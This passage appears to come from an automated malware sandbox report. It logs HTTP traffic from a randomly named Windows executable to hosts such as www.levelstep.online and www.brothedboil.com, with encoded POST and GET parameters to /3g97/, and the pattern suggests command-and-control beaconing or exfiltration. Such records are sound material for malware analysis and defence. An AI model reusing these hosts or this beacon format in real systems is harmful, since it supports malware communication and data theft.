5a 6a 42 51 30 57 58 43 4a 64 7a 47 4d 37 65 77 2f 51 67 58 4d 66 35 68 63 42 44 75 79 41 4d 35 34 2b 61 77 62 63 69 32 74 64 4e 53 77 48 68 32 72 73 42 2b 35 55 31 50 7a 7a 35 58 66 35 37 52 50 6a 2f 64 30 61 6a 4b 6f 34 6d 62 67 63 64 6f 76 37 79 66 32 37 43 49 5a 50 35 6a 76 7a 4d 6d 58 55 6b 73 56 66 59 42 57 67 37 65 6c 34 4a 38 4a 6d 70 65 52 64 53 42 4f 6e 79 6e 4d 36 63 59 55 51 4a 50 77 6a 38 72 4e 70 7a 46 64 45 36 45 36 72 64 51 4e 49 41 52 5a 46 49 4e 69 4e 33 68 46 66 41 31 2b 44 45 34 5a 45 59 75 72 44 59 54 4c 61 49 54 77 4f 69 35 2b 6d 51 62 43 42 51 68 61 68 77 53 4c 78 6a 58 72 55 49 35 79 66 79 69 2b 47 6b 47 6c 70 7a 78 35 31 6b 69 38 6b 6b 31 5a 4a 58 6a 49 31 38 37 39 51 7a 36 6c 75 7a 4a 45 62 46 58 2f 76 31 4e 49 70 4b 2b 50 52 36 48 34 4f 37 55 73 51 75 45 67 6a 68 36 65 38 6c 67 78 50 59 2b 43 53 54 43 43 47 35 33 30 4d 47 78 4b 67 33 78 38 6f 62 52 4f 4f 45 76 59 36 30 61 39 76 2f 77 44 67 6f 67 6d 4d 75 63 77 37 47 6b 68 47 51 47 64 64 76 72 4b 54 36 6a 43 34 35 7a 62 57 73 43 4e 71 67 37 42 74 6b 56 6d 51 41 31 73 65 54 6b 63 53 54 71 54 32 76 73 46 64 61 4f 55 67 71 4f 45 6b 4c 35 47 6c 68 43 5a 57 42 6e 78 6b 51 53 63 2f 36 5a 66 2b 61 77 46 72 49 38 53 65 7a 4f 5a 34 73 35 6c 72 6c 48 49 45 69 44 2f 64 43 58 67 35 34 52 38 6a 6c 4a 34 6d 4d 50 37 72 44 61 6b 57 68 51 4c 64 33 78 4f 79 66 5a 54 63 53 52 53 47 64 4a 6b 65 39 6a 39 63 54 78 43 74 69 6d 62 32 58 68 6c 72 4e 36 50 31 48 4b 6d 62 4d 50 4e 65 73
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:28:38.336600065 CEST469INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:28:01 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.44977731.186.11.254801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:40.873035908 CEST458OUTGET /3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4= HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:41.227427959 CEST469INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:28:04 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.44977891.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:46.802004099 CEST734OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 66 67 4f 4f 59 61 51 5a 68 33 36 5a 6e 4b 6f 47 33 75 71 59 4a 75 53 54 54 56 4a 57 39 64 76 2f 2b 4e 34 69 59 78 71 78 62 44 2b 2f 35 7a 6c 37 77 62 61 6a 4e 56 6f 62 2b 5a 69 53 76 67 47 78 72 2f 54 38 6d 4d 47 56 71 65 4d 64 64 78 79 49 70 75 53 54 51 58 79 4c 68 2b 76 7a 7a 4f 4b 32 4e 72 73 61 79 64 5a 2b 70 55 6c 33 65 37 69 46 66 61 6d 52 52 4e 46 50 49 43 4d 7a 72 67 37 62 5a 50 72 33 4e 62 31 6e 75 39 65 54 69 41 4f 4d 61 74 4e 61 74 6b 75 7a 49 68 7a 43 62 6a 47 52 32 4c 69 61 50 38 58 30 47 51 2b 6c 4b 4e 34 63 39 42 74 69 4e 4e 5a 61 48 4f 57 70 64 6f 7a 57 48 41 3d 3d
                                                                                              Data Ascii: 12l42=fgOOYaQZh36ZnKoG3uqYJuSTTVJW9dv/+N4iYxqxbD+/5zl7wbajNVob+ZiSvgGxr/T8mMGVqeMddxyIpuSTQXyLh+vzzOK2NrsaydZ+pUl3e7iFfamRRNFPICMzrg7bZPr3Nb1nu9eTiAOMatNatkuzIhzCbjGR2LiaP8X0GQ+lKN4c9BtiNNZaHOWpdozWHA==
                                                                                              Apr 24, 2024 07:28:47.119467974 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:46 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.44977991.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:49.635121107 CEST754OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 66 67 4f 4f 59 61 51 5a 68 33 36 5a 6d 71 59 47 32 4e 79 59 4c 4f 53 53 50 6c 4a 57 7a 39 76 46 2b 4e 6b 69 59 77 2f 75 62 78 4b 2f 35 54 56 37 69 4b 61 6a 4f 56 6f 62 32 35 69 54 78 51 47 75 72 2f 4f 4a 6d 4d 4b 56 71 65 77 64 64 77 43 49 70 66 53 51 52 48 79 46 39 2b 76 69 74 2b 4b 32 4e 72 73 61 79 63 39 45 70 55 39 33 65 4b 53 46 5a 37 6d 57 4e 39 46 41 41 69 4d 7a 36 51 37 66 5a 50 71 53 4e 61 6f 36 75 37 53 54 69 42 2b 4d 5a 38 4e 56 6e 6b 75 78 48 42 79 42 52 42 44 55 79 71 58 49 51 38 53 53 4a 44 72 44 47 72 70 47 73 77 4d 31 66 4e 39 70 61 4a 66 64 51 72 4f 66 63 44 43 74 6c 6c 31 4f 58 56 61 77 6f 67 35 4b 52 2b 73 6b 54 68 6b 3d
                                                                                              Data Ascii: 12l42=fgOOYaQZh36ZmqYG2NyYLOSSPlJWz9vF+NkiYw/ubxK/5TV7iKajOVob25iTxQGur/OJmMKVqewddwCIpfSQRHyF9+vit+K2Nrsayc9EpU93eKSFZ7mWN9FAAiMz6Q7fZPqSNao6u7STiB+MZ8NVnkuxHByBRBDUyqXIQ8SSJDrDGrpGswM1fN9paJfdQrOfcDCtll1OXVawog5KR+skThk=
                                                                                              Apr 24, 2024 07:28:49.940563917 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:49 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              39192.168.2.44978091.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:52.470910072 CEST10836OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 66 67 4f 4f 59 61 51 5a 68 33 36 5a 6d 71 59 47 32 4e 79 59 4c 4f 53 53 50 6c 4a 57 7a 39 76 46 2b 4e 6b 69 59 77 2f 75 62 78 53 2f 35 43 31 37 77 39 6d 6a 50 56 6f 62 38 5a 69 57 78 51 48 30 72 2f 57 4e 6d 4d 58 33 71 59 30 64 63 53 4b 49 2b 38 4b 51 59 48 79 46 32 65 76 79 7a 4f 4c 30 4e 6f 55 65 79 64 4e 45 70 55 39 33 65 4a 36 46 61 71 6d 57 65 74 46 50 49 43 4d 30 72 67 37 37 5a 50 53 6f 4e 5a 45 71 75 72 79 54 6c 68 75 4d 63 4f 6c 56 76 6b 75 4a 41 42 79 6a 52 41 2f 66 79 71 4c 36 51 2f 50 33 4a 43 54 44 58 4e 51 61 32 54 73 58 4e 75 68 50 4a 62 33 37 54 61 61 34 58 52 75 4f 71 6e 4a 4d 49 57 57 51 67 44 6b 6d 4d 37 67 43 46 32 65 35 42 4d 38 74 41 37 56 44 57 63 70 56 6c 66 4c 44 79 30 35 78 32 65 4d 47 2f 6f 50 41 63 71 49 71 6a 53 63 79 2f 57 74 61 59 78 52 4d 2b 78 67 44 71 30 56 76 38 4d 35 45 72 37 70 71 54 52 69 67 35 79 49 6f 37 78 66 55 65 78 4e 7a 41 39 43 39 48 33 7a 58 75 38 53 47 4f 47 37 78 39 78 37 77 49 57 73 41 66 79 5a 4f 51 35 6b 74 63 72 68 64 2b 39 75 31 72 6d 4c 48 35 52 67 59 4d 30 6a 74 38 61 6a 37 58 39 45 51 5a 48 47 61 2b 55 5a 72 48 2b 68 31 65 71 39 57 72 4a 38 4d 6f 56 76 65 48 56 77 6d 34 45 30 51 53 33 39 79 64 45 61 4e 58 62 4a 50 55 68 43 57 2b 4c 45 6a 62 6a 48 73 31 79 48 6d 68 58 63 35 58 4a 50 69 2b 61 74 58 68 53 55 37 52 44 73 6c 72 66 36 6e 47 58 75 36 66 61 33 69 34 6e 77 74 34 41 38 56 36 5a 6e 6f 31 58 49 36 7a 43 43 57 76 7a 30 6a 56 67 2f 4d 70 55 51 32 35 58 65 59 4a 2b 63 66 69 52 6d 6a 